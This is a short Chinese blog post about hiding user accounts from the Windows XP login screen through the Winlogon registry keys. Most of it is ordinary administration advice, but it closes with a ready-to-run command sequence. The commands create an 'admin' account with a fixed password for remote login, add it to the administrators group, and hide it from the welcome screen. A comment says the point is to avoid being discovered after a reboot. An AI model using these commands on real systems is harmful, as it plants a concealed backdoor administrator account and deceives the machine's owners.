在XP登录屏幕隐藏用户名

       默认的Windows XP登录屏幕显示了系统中现有用户帐号的下拉列表。通常情况下,所有的帐号(除管理员帐号以外)都会出现,这个“友好的”XP界面是为家庭用户使用方便考虑设计的。多个家庭成员可以共用一台电脑而且帐户不用隐藏。

  其实,也有办法让XP在登录窗口隐藏或显示用户帐号。通常这个办法用于隐藏内置的管理员帐号(以及其他内置的系统帐户比如ASPNET帐号)。要登录进入管理员帐号,需要重启系统并在安全状态下进行。

  注册表中的一个键显示哪些用户帐户被隐藏、哪些在登录时可以显示。在HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/SpecialAccounts/UserList,有一系列双字节值。每个键名是隐藏的帐户用户名,要把值设为0。要添加并隐藏的帐户用户名,新建一个双字节值,以要隐藏的帐户用户名命名该键,然后设置键值为0。要取消隐藏,只要删除该键就可以了。

  还有一个更加安全的办法,那就是在控制面板中选择“改变用户登录和关机方式”,去掉“使用欢迎屏幕”前的勾。此外,管理员还可以通过修改注册表来隐藏所有的帐户名,编辑HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon,添加或更改双字节值DontDisplayLastUserName,将其值设为1。

  下面给出一个例子:

#添加一个用户,用于远程登陆
net user admin myadmin /add
#将用户添加如administrators组
net localgroup administrators admin /add
#设置admin用户不要在系统欢迎界面上出现,否则机器一重启就被发现
reg add "HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/SpecialAccounts/UserList" /v admin /t REG_DWORD /d 0x0

阅读更多
文章标签: xp windows user
个人分类: 安全技术
上一篇利用IE Object Data 远程执行漏洞开后门
下一篇nt下超强的杀进程命令ntsd
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

关闭
关闭
关闭